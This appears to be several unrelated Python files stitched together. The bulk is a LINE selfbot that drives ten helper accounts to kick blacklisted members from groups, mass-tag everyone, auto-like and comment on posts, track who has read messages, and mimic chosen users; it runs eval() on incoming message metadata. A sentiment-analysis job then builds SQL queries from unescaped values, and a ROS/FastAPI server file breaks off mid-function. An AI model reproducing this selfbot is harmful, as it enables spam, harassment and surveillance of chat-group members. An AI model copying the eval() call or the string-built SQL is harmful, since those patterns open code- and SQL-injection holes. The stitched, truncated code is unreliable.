msgs+="\n══════════List Blacklist═════════\n\nTotal Blacklist : %i" % len(wait["blacklist"])
cl.sendText(msg.to, msgs)
elif msg.text in ["Mcheckcontact","Cb"]:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"Tidak Ada Blacklist")
else:
cl.sendText(msg.to,"Daftar Blacklist")
h = ""
for i in wait["blacklist"]:
h = cl.getContact(i)
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': i}
cl.sendMessage(M)
elif msg.text in ["Midban","Mid ban"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
num=1
cocoa = "══════════List Blacklist═════════"
for mm in matched_list:
cocoa+="\n[%i] %s" % (num, mm)
num=(num+1)
cocoa+="\n═════════List Blacklist═════════\n\nTotal Blacklist : %i" % len(matched_list)
cl.sendText(msg.to,cocoa)
elif msg.text.lower() == '1kill':
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
ki1.sendText(msg.to,"Tidak ada Daftar Blacklist")
return
for jj in matched_list:
try:
ki1.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
#==============================================#
elif msg.text in ["in on"]:
if msg.from_ in admin:
if wait["pautoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["pautoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["in off"]:
if msg.from_ in admin:
if wait["pautoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["pautoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
elif "/ตัส" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to,"[name]\n" + contact.displayName + "\n[mid]\n" + contact.mid + "\n[statusmessage]\n" + contact.statusMessage + "\n[profilePicture]\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[homePicture]\n" + str(cu))
except:
cl.sendText(msg.to,"[name]\n" + contact.displayName + "\n[mid]\n" + contact.mid + "\n[statusmessage]\n" + contact.statusMessage + "\n[homePicture]\n" + str(cu))
#=============================================
elif msg.text in ["!Sp"]:
start = time.time()
cl.sendText(msg.to, "Waiting...")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sTamii Server" % (elapsed_time))
# ----------------- BAN MEMBER BY TAG 2TAG ATAU 10TAG MEMBER
elif ("Bl " in msg.text):
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Succes Banned Bos")
except:
pass
#-------------Fungsi Respon Start---------------------#
elif msg.text in ["#Cinvite"]:
if msg.from_ in admin:
wait["winvite"] = True
cl.sendText(msg.to,"send contact 😉")
elif "Gift @" in msg.text:
_name = msg.text.replace("Gift @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
msg.contentType = 2
msg.contentMetadata={'PRDID': '89131c1a-e549-4bd5-9e60-e24de0d2e252',
'PRDTYPE': 'THEME',
'MSGTPL': '10'}
msg.text = None
cl.sendMessage(msg,g)
cl.sendText(msg.to, "Done...")
elif msg.text in ["Mchecky"]:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"nothing")
else:
cl.sendText(msg.to,"Blacklist user\nมีบัญชีดำของคุณอยู่กลุ่มนี้")
xname = ""
for mi_d in wait["blacklist"]:
xname = cl.getContact(mi_d).displayName + ""
xlen = str(len(xname)+1)
msg.contentType = 0
msg.text = "@"+xname+" "
msg.contentMetadata ={'MENTION':'{"MENTIONEES":[{"S":"0","E":'+json.dumps(xlen)+',"M":'+json.dumps(mm)+'}]}','EMTVER':'4'}
try:
cl.sendMessage(msg)
except Exception as error:
print error
elif msg.text in ["Name me","Men"]:
G = cl.getProfile()
X = G.displayName
cl.sendText(msg.to,X)
elif "siri " in msg.text.lower():
query = msg.text.lower().replace("siri ","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'https://google-translate-proxy.herokuapp.com/api/tts'
params = {'language': 'th', 'speed': '1', 'query': query}
r = s.get(url, params=params)
mp3 = r.url
cl.sendAudioWithUrl(msg.to, mp3)
elif "siri:" in msg.text.lower():
query = msg.text.lower().replace("siri:","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'https://google-translate-proxy.herokuapp.com/api/tts'
params = {'language': 'th', 'speed': '1', 'query': query}
r = s.get(url, params=params)
mp3 = r.url
cl.sendAudioWithUrl(msg.to, mp3)
elif "siri-en " in msg.text.lower():
query = msg.text.lower().replace("siri-en ","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'https://google-translate-proxy.herokuapp.com/api/tts'
params = {'language': 'en', 'speed': '1', 'query': query}
r = s.get(url, params=params)
mp3 = r.url
cl.sendAudioWithUrl(msg.to, mp3)
elif "say " in msg.text.lower():
query = msg.text.lower().replace("say ","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'https://google-translate-proxy.herokuapp.com/api/tts'
params = {'language': 'th', 'speed': '1', 'query': query}
r = s.get(url, params=params)
mp3 = r.url
cl.sendAudioWithUrl(msg.to, mp3)
elif msg.text in ["kick1","K1"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki1.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki1.updateGroup(G)
print "kickers_Ok"
G.preventJoinByTicket(G)
ki1.updateGroup(G)
elif msg.text in ["kick2","K2"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki2.updateGroup(G)
print "kickers_Ok"
G.preventJoinByTicket(G)
ki2.updateGroup(G)
elif msg.text in ["kick3","K3"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki3.updateGroup(G)
print "kickers_Ok"
G.preventJoinByTicket(G)
ki3.updateGroup(G)
elif msg.text in ["kick4","K4"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki4.updateGroup(G)
print "kickers_Ok"
G.preventJoinByTicket(G)
ki4.updateGroup(G)
elif msg.text in ["kick5","K5"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki5.updateGroup(G)
print "kickers_Ok"
G.preventJoinByTicket(G)
ki5.updateGroup(G)
elif msg.text in ["kick6","K6"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki6.updateGroup(G)
print "kickers_Ok"
G.preventJoinByTicket(G)
ki6.updateGroup(G)
elif msg.text in ["kick7","K7"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki7.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki7.updateGroup(G)
print "kickers_Ok"
G.preventJoinByTicket(G)
ki7.updateGroup(G)
elif msg.text in ["kick8","K8"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki8.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki8.updateGroup(G)
print "kickers_Ok"
G.preventJoinByTicket(G)
ki8.updateGroup(G)
elif msg.text in ["kick9","K9"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki9.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki9.updateGroup(G)
print "kickers_Ok"
G.preventJoinByTicket(G)
ki9.updateGroup(G)
elif msg.text in ["kick10","K10"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki10.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki10.updateGroup(G)
print "kickers_Ok"
G.preventJoinByTicket(G)
ki10.updateGroup(G)
elif '/w ' in msg.text.lower():
try:
wiki = msg.text.lower().replace("/w ","")
wikipedia.set_lang("th")
pesan="Wikipedia : "
pesan+=wikipedia.page(wiki).title
pesan+="\n\n"
pesan+=wikipedia.summary(wiki, sentences=1)
pesan+="\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except:
try:
pesan="Text Terlalu Panjang Silahkan Click link di bawah ini\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except Exception as e:
cl.sendText(msg.to, str(e))
elif "/go " in msg.text:
tanggal = msg.text.replace("/go ","")
r=requests.get('https://script.google.com/macros/exec?service=AKfycbw7gKzP-WYV2F5mc9RaR7yE3Ve1yN91Tjs91hp_jHSE02dSv9w&nama=ervan&tanggal='+tanggal)
data=r.text
data=json.loads(data)
lahir = data["data"]["lahir"]
usia = data["data"]["usia"]
ultah = data["data"]["ultah"]
zodiak = data["data"]["zodiak"]
cl.sendText(msg.to,"Tanggal Lahir : "+lahir+"\n\nUmur : "+usia+"\n\nUltah : "+ultah+"\n\nZodiak : "+zodiak)
elif "declined" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
cl.leaveGroup(msg.to)
except:
pass
elif "[Auto] " in msg.text:
msg.contentType = 13
_name = msg.text.replace("[Auto] ","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
msg.contentMetadata = {'mid': g.mid}
cl.sendMessage(msg)
else:
pass
elif "☜ʕ•ﻌ•ʔ " in msg.text:
msg.contentType = 13
_name = msg.text.replace("☜ʕ•ﻌ•ʔ ","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
msg.contentMetadata = {'mid': g.mid}
cl.sendMessage(msg)
else:
pass
if op.type == 25:
msg = op.message
if msg.text.lower() in ["pheytcg fgtagg all"]:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
nm1, nm2, nm3, nm4, nm5, jml = [], [], [], [], [], len(nama)
if jml <= 100:
mention(msg.to, nama)
if jml > 100 and jml < 200:
for i in range(0, 100):
nm1 += [nama[i]]
mention(msg.to, nm1)
for j in range(101, len(nama)):
nm2 += [nama[j]]
mention(msg.to, nm2)
if jml > 200 and jml < 300:
for i in range(0, 100):
nm1 += [nama[i]]
mention(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention(msg.to, nm2)
for k in range(201, len(nama)):
nm3 += [nama[k]]
mention(msg.to, nm3)
if jml > 300 and jml < 400:
for i in range(0, 100):
nm1 += [nama[i]]
mention(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention(msg.to, nm2)
for k in range(201, 300):
nm3 += [nama[k]]
mention(msg.to, nm3)
for l in range(301, len(nama)):
nm4 += [nama[l]]
mention(msg.to, nm4)
if jml > 400 and jml < 500:
for i in range(0, 100):
nm1 += [nama[i]]
mention(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention(msg.to, nm2)
for k in range(201, 300):
nm3 += [nama[k]]
mention(msg.to, nm3)
for l in range(301, 400):
nm4 += [nama[l]]
mention(msg.to, nm4)
for h in range(401, len(nama)):
nm5 += [nama[h]]
mention(msg.to, nm5)
if jml > 500:
cl.sendText(msg.to,'Member melebihi batas.')
cnt = Message()
cnt.text = "PHET TAG DONE : " + str(jml) + " Members"
cnt.to = msg.to
cl.sendMessage(cnt)
if op.type == 26:
msg = op.message
if msg.text.lower() in ["1123"]:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
nm1, nm2, nm3, nm4, nm5, jml = [], [], [], [], [], len(nama)
if jml <= 100:
mention(msg.to, nama)
if jml > 100 and jml < 200:
for i in range(0, 100):
nm1 += [nama[i]]
mention(msg.to, nm1)
for j in range(101, len(nama)):
nm2 += [nama[j]]
mention(msg.to, nm2)
if jml > 200 and jml < 300:
for i in range(0, 100):
nm1 += [nama[i]]
mention(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention(msg.to, nm2)
for k in range(201, len(nama)):
nm3 += [nama[k]]
mention(msg.to, nm3)
if jml > 300 and jml < 400:
for i in range(0, 100):
nm1 += [nama[i]]
mention(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention(msg.to, nm2)
for k in range(201, 300):
nm3 += [nama[k]]
mention(msg.to, nm3)
for l in range(301, len(nama)):
nm4 += [nama[l]]
mention(msg.to, nm4)
if jml > 400 and jml < 500:
for i in range(0, 100):
nm1 += [nama[i]]
mention(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention(msg.to, nm2)
for k in range(201, 300):
nm3 += [nama[k]]
mention(msg.to, nm3)
for l in range(301, 400):
nm4 += [nama[l]]
mention(msg.to, nm4)
for h in range(401, len(nama)):
nm5 += [nama[h]]
mention(msg.to, nm5)
if jml > 500:
cl.sendText(msg.to,'Member melebihi batas.')
cnt = Message()
cnt.text = "PHET TAG DONE : " + str(jml) + " Members"
cnt.to = msg.to
cl.sendMessage(cnt)
elif msg.text in ["คท"]:
cl.sendText(msg.to,"😆เช็คจัง กลัวmybotหลุด ล่ะสิ😆")
elif msg.text in ["เทสmybot"]:
cl.sendText(msg.to,"SELF BOT\n[By.☬ARIFISTIFIK☬]")
elif msg.text in [".อยู่ไหม"]:
cl.sendText(msg.to,"อยู่...")
elif msg.text in ["/อยู่ไหม"]:
cl.sendText(msg.to,"เรื่องของกู...")
elif msg.text in ["/Online checkไหม"]:
cl.sendText(msg.to,"Online check")
elif msg.text in ["/ปิดป้องกัน"]:
cl.sendText(msg.to,"ปิดป้องกัน")
elif "Lurk on" == msg.text.lower():
if msg.to in wait2['readPoint']:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%H:%M:%S')
wait2['ROM'][msg.to] = {}
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.sendText(msg.to,"Lurking already on\nเปิดการอ่านอัตโนมัตกรุณาพิมพ์ ➠ /อ่าน")
else:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%H:%M:%S')
wait2['ROM'][msg.to] = {}
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.sendText(msg.to, "โปรเเกรมเปิดการอ่านอัตโนมัต\nSet reading point:\n" + datetime.now().strftime('%H:%M:%S'))
print wait2
elif "Lurk off" == msg.text.lower():
if msg.to not in wait2['readPoint']:
cl.sendText(msg.to,"Lurking already off\nปิดการอ่านอัตโนมัต")
else:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
cl.sendText(msg.to, "ปิดการอ่านอัตโนมัต\nDelete reading point:\n" + datetime.now().strftime('%H:%M:%S'))
elif "/อ่าน" == msg.text.lower():
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
cl.sendText(msg.to, "SELF BOT\n[By.☬ARIFISTIFIK☬] \n\nLurkers:\nNone")
else:
chiya = []
for rom in wait2["ROM"][msg.to].items():
chiya.append(rom[1])
cmem = cl.getContacts(chiya)
zx = ""
zxc = ""
zx2 = []
xpesan = 'Lurkers:\n'
for x in range(len(cmem)):
xname = str(cmem[x].displayName)
pesan = ''
pesan2 = pesan+"@a\n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':cmem[x].mid}
zx2.append(zx)
zxc += pesan2
msg.contentType = 0
print zxc
msg.text = xpesan+ zxc + "\nLurking time: %s\nCurrent time: %s"%(wait2['setTime'][msg.to],datetime.now().strftime('%H:%M:%S'))
lol ={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}
print lol
msg.contentMetadata = lol
try:
cl.sendMessage(msg)
except Exception as error:
print error
pass
else:
cl.sendText(msg.to, "กรุณาตั้งเวลาการอ่านใหม่อีกครั้งโปรดพิมพ์ ➠ Lurk on")
elif msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True:
text = msg.text
if text is not None:
cl.sendText(msg.to, "[อัตโนมัติ]: " + text)
else:
if msg.contentType == 7:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "6",
"STKPKGID": "1", "STKVER": "100" }
cl.sendMessage(msg)
if op.type == 26:
msg = op.message
if msg.contentType == 16:
url = msg.contentMetadata['postEndUrl']
cl.like(url[25:58], url[66:], likeType=1001)
cl.comment(url[25:58], url[66:], wait["comment1"])
ki1.like(url[25:58], url[66:], likeType=1001)
ki1.comment(url[25:58], url[66:], wait["comment1"])
ki2.like(url[25:58], url[66:], likeType=1001)
ki2.comment(url[25:58], url[66:], wait["comment1"])
ki3.like(url[25:58], url[66:], likeType=1001)
ki3.comment(url[25:58], url[66:], wait["comment1"])
ki4.like(url[25:58], url[66:], likeType=1001)
ki4.comment(url[25:58], url[66:], wait["comment1"])
ki5.like(url[25:58], url[66:], likeType=1001)
ki5.comment(url[25:58], url[66:], wait["comment1"])
ki6.like(url[25:58], url[66:], likeType=1001)
ki6.comment(url[25:58], url[66:], wait["comment1"])
ki7.like(url[25:58], url[66:], likeType=1001)
ki7.comment(url[25:58], url[66:], wait["comment1"])
ki8.like(url[25:58], url[66:], likeType=1001)
ki8.comment(url[25:58], url[66:], wait["comment1"])
ki9.like(url[25:58], url[66:], likeType=1001)
ki9.comment(url[25:58], url[66:], wait["comment1"])
ki10.like(url[25:58], url[66:], likeType=1001)
ki10.comment(url[25:58], url[66:], wait["comment1"])
print ("AUTO LIKE DPK🐲BOT")
print ("Auto Like By.☬ARIFISTIFIK☬")
if op.type == 15:
if wait["Notifed"] == True:
if op.param2 in Bots:
return
cl.sendText(op.param1,cl.getContact(op.param2).displayName + "\n เเล้วพบใหม่นะ ")
print "MEMBER OUT GROUP"
if op.type == 17:
if wait["Notifed"] == True:
if op.param2 in Bots:
return
ginfo = cl.getGroup(op.param1)
contact = cl.getContact(op.param2)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
cl.sendImageWithUrl(op.param1,image)
msg.contentType = 7
msg.contentMetadata={
'STKPKGID': '9662',
'STKTXT': '[]',
'STKVER': '16',
'STKID':'707'
}
cl.sendMessage(msg)
print "MEMBER HAS JOIN THE GROUP"
if op.type == 19:
if wait["Notifed"] == True:
if op.param2 in Bots:
return
cl.sendText(op.param1,cl.getContact(op.param2).displayName + "\n ไม่น่าจะจุกเท่าไหร่หรอก ")
print "MEMBER HAS KICKOUT FROM THE GROUP"
if op.type == 15:
if wait["Notifedbot"] == True:
if op.param2 in Bots:
return
ki1.sendText(op.param1,cl.getContact(op.param2).displayName + "\n\n Bye~bye ")
ki2.sendText(op.param1,cl.getContact(op.param2).displayName + "\n\n Bye~bye ")
print "MEMBER OUT GROUP"
if op.type == 17:
if wait["Notifedbot"] == True:
if op.param2 in Bots:
return
ginfo = cl.getGroup(op.param1)
contact = cl.getContact(op.param2)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendImageWithUrl(op.param1,image)
cl.sendText(op.param1,cl.getContact(op.param2).displayName + "\n\n[🙋ยินดีตอนรับ][By. ☬ARIFISTIFIK☬]")
print "MEMBER HAS JOIN THE GROUP"
if op.type == 19:
if wait["Notifedbot"] == True:
if op.param2 in Bots:
return
ki1.sendText(op.param1,cl.getContact(op.param2).displayName + "\n ไม่น่าจะจุกเท่าไหร่หรอก ")
ki2.sendText(op.param1,cl.getContact(op.param2).displayName + "\n ไม่น่าจะจุกเท่าไหร่หรอก ")
print "MEMBER HAS KICKOUT FROM THE GROUP"
if op.type == 15:
if wait["bcommentOn"] == True:
if op.param2 in Bots:
return
cl.sendText(op.param1,cl.getContact(op.param2).displayName + "\n" + str(wait["bcomment"]))
print "MEMBER OUT GROUP"
if op.type == 17:
if wait["acommentOn"] == True:
if op.param2 in Bots:
return
cl.sendText(op.param1,cl.getContact(op.param2).displayName + "\n" + str(wait["acomment"]))
print "MEMBER HAS JOIN THE GROUP"
if op.type == 19:
if wait["ccommentOn"] == True:
if op.param2 in Bots:
return
cl.sendText(op.param1,cl.getContact(op.param2).displayName + "\n" + str(wait["ccomment"]))
print "MEMBER HAS KICKOUT FROM THE GROUP"
if op.type == 13:
if wait["Protectcancl"] == True:
if op.param2 not in Bots:
group = cl.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
random.choice(KAC).cancelGroupInvitation(op.param1, gMembMids)
if op.param3 == "1":
if op.param1 in protectname:
group = cl.getGroup(op.param1)
try:
group.name = wait["pro_name"][op.param1]
cl.updateGroup(group)
cl.sendText(op.param1, "Groupname protect now")
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except Exception as e:
print e
pass
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
if op.param2 in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += op.param2
wait2['ROM'][op.param1][op.param2] = op.param2
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
else:
pass
except:
pass
if op.type == 59:
print op
except Exception as error:
print error
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
if nowT[14:] in ["10","20","30","40","50","00"]:
return False
else:
return True
def nameUpdate():
while True:
try:
#while a2():
#pass
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"༺%H:%M༻")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
time.sleep(600)
except:
pass
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
|
sentiment_analysis.py | """Generate account statements.
This module will create statement records for each account.
"""
import os
import threading
import psycopg2
from transformers import pipeline
from api.services.transformers import overall_sentiment_transformers
from flask import Flask
import config
from utils.logger import setup_logging, log_info
from dbms import client, Databse
setup_logging(
os.path.join(os.path.abspath(os.path.dirname(__file__)), "logging.conf")
) # important to do this first
APP_CONFIG = config.get_named_config(os.getenv("DEPLOYMENT_ENV", "production"))
class LoadModel: # pylint: disable=too-few-public-methods
"""Manages the model."""
classifier = None
model_id = APP_CONFIG.MODEL_ID
@classmethod
def preload_models(cls):
"""Function to load the fine-tuned transformer model."""
cls.classifier = pipeline(
"sentiment-analysis", model=cls.model_id, truncation=True
)
return 0
# pylint:disable=no-member
def create_app(run_mode=os.getenv("FLASK_ENV", "production")):
"""Return a configured Flask App using the Factory method."""
app = Flask(__name__)
app.config.from_object(config.CONFIGURATION[run_mode])
app.logger.info("<<<< Starting Sentiment analysis job >>>>")
register_shellcontext(app)
preloading = threading.Thread(target=LoadModel.preload_models)
preloading.start()
log_info("Model is loading...")
preloading.join()
log_info("Model loading complete.")
app.classifier = LoadModel.classifier
return app
def register_shellcontext(app):
"""Register shell context objects."""
def shell_context():
"""Shell context objects."""
return {"app": app} # pragma: no cover
app.shell_context_processor(shell_context)
def update_sentiment():
"""Update sentiment by querying the records."""
conn = None
try:
log_info("Starting sentiment analysis.")
# connect to the PostgreSQL server
conn = client.connect(Databse[APP_CONFIG.DBMS].value, APP_CONFIG)
table_name = APP_CONFIG.DATABASE_TABLE_NAME
input_col = APP_CONFIG.DATABASE_INPUT_COLUMN
output_col = APP_CONFIG.DATABASE_OUTPUT_COLUMN
# Find primary key for the table.
primary_keys = _find_primary_keys(conn, table_name)
log_info(f"found primary keys : {primary_keys}")
# Query the rows from table.
cols_to_query = f"{primary_keys},{input_col}"
rows_query = client.get_row_query(
Databse[APP_CONFIG.DBMS].value,
cols_to_query,
table_name,
output_col,
limit=100,
)
log_info("Query executed")
try:
cur = conn.cursor()
cur.execute(rows_query)
colnames = [desc[0] for desc in cur.description]
results = cur.fetchall()
finally:
cur.close()
_perform_analysis(colnames, conn, results)
# commit the changes
conn.commit()
except (Exception, psycopg2.DatabaseError) as error: # noqa
raise error
finally:
if conn is not None:
conn.close()
def _find_primary_keys(conn, table_name):
"""Fetch the primary keys of rows that match the pf_query."""
# Generalized query to support different databases.
pk_query = (
f"SELECT column_name FROM information_schema.table_constraints AS tc "
f"JOIN information_schema.key_column_usage AS kc ON tc.CONSTRAINT_CATALOG = "
f"kc.CONSTRAINT_CATALOG AND tc.CONSTRAINT_SCHEMA = "
f"kc.CONSTRAINT_SCHEMA AND tc.CONSTRAINT_NAME "
f" = kc.CONSTRAINT_NAME AND tc.TABLE_CATALOG = kc.TABLE_CATALOG AND tc.TABLE_SCHEMA "
f"= kc.TABLE_SCHEMA AND tc.TABLE_NAME = kc.TABLE_NAME "
f"WHERE constraint_type = 'PRIMARY KEY' AND (tc.table_name) = "
f"('{table_name}') ORDER BY ordinal_position;"
)
try:
cur = conn.cursor()
cur.execute(pk_query)
primary_keys = ",".join(cur.fetchall()[0])
finally:
cur.close()
return primary_keys
def _perform_analysis(colnames, conn, results):
# Create a list of dicts with column name and results.
table_name = APP_CONFIG.DATABASE_TABLE_NAME
input_col = APP_CONFIG.DATABASE_INPUT_COLUMN
output_col = APP_CONFIG.DATABASE_OUTPUT_COLUMN
query_results = [dict(zip(colnames, result)) for result in results]
count: int = 0
for result_dict in query_results:
log_info(f"Finding sentiment for for {result_dict}")
sentiment = overall_sentiment_transformers(result_dict.get(input_col))
log_info(f"Sentiment {sentiment}")
update_qry = f"update {table_name} set {output_col}='{sentiment}' where 1=1 "
for key, value in result_dict.items():
if key != input_col:
update_qry += f" AND {key}='{value}' "
try:
cur = conn.cursor()
cur.execute(update_qry)
finally:
cur.close()
count += 1
print(f"Updated {count} records")
def run():
"""Run the job."""
application = create_app()
application.app_context().push()
update_sentiment()
if __name__ == "__main__":
run()
|
main.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import time
from os import path
import rospy
import threading
from typing import Dict, Any
from std_msgs.msg import String
import uvicorn
from pydantic import BaseModel
from fastapi import FastAPI, Request
from fastapi.staticfiles import StaticFiles
from fastapi.templating import Jinja2Templates
from fastapi.middleware.cors import CORSMiddleware
from fastapi.responses import HTMLResponse, JSONResponse, FileResponse
from shutil import copyfile
from os import remove
# ROS related
threading.Thread(
target=lambda: rospy.init_node("backend", disable_signals=True)
).start()
# function wait until drawing picture will be available
def picture_exist() -> str:
